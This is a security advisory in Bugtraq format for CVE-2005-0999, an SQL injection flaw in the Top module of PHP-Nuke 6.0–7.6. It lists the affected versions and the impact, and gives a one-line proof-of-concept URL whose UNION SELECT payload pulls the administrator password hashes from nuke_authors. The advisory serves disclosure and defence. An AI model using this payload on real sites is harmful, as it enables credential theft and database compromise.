PHP-Nuke Top Module SQL Injection Vulnerability

Bugtraq ID:	13047
Class:	Input Validation Error
CVE:	CVE-2005-0999
Remote:	Yes
Local:	No
Published:	Apr 06 2005 12:00AM
Updated:	Jul 12 2009 12:56PM
Credit:	Discovery credited to Janek Vind <[email protected]>.
Vulnerable:	Francisco Burzi PHP-Nuke 7.6 Francisco Burzi PHP-Nuke 7.3 Francisco Burzi PHP-Nuke 7.3 Francisco Burzi PHP-Nuke 7.2 Francisco Burzi PHP-Nuke 7.1 Francisco Burzi PHP-Nuke 7.0 FINAL Francisco Burzi PHP-Nuke 7.0 Francisco Burzi PHP-Nuke 6.9 Francisco Burzi PHP-Nuke 6.7 Francisco Burzi PHP-Nuke 6.6 Francisco Burzi PHP-Nuke 6.5 RC3 Francisco Burzi PHP-Nuke 6.5 RC2 Francisco Burzi PHP-Nuke 6.5 RC1 Francisco Burzi PHP-Nuke 6.5 FINAL Francisco Burzi PHP-Nuke 6.5 BETA 1 Francisco Burzi PHP-Nuke 6.5 Francisco Burzi PHP-Nuke 6.0
Not Vulnerable:

PHP-Nuke Top Module SQL Injection Vulnerability

PHP-Nuke is prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input.

This issue may allow a remote attacker to manipulate query logic, potentially leading to unauthorized access to sensitive information such as the administrator password hash or corruption of database data. SQL injection attacks may also potentially be used to exploit latent vulnerabilities in the underlying database implementation.

PHP-Nuke Top Module SQL Injection Vulnerability

No exploit is required.

The following proof of concept was provided:

http://www.example.com/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*

PHP-Nuke Top Module SQL Injection Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

PHP-Nuke Top Module SQL Injection Vulnerability

References:

• [waraxe-2005-SA#041] - Critical Sql Injection in PhpNuke 6.x-7.6 Top module (Janek Vind )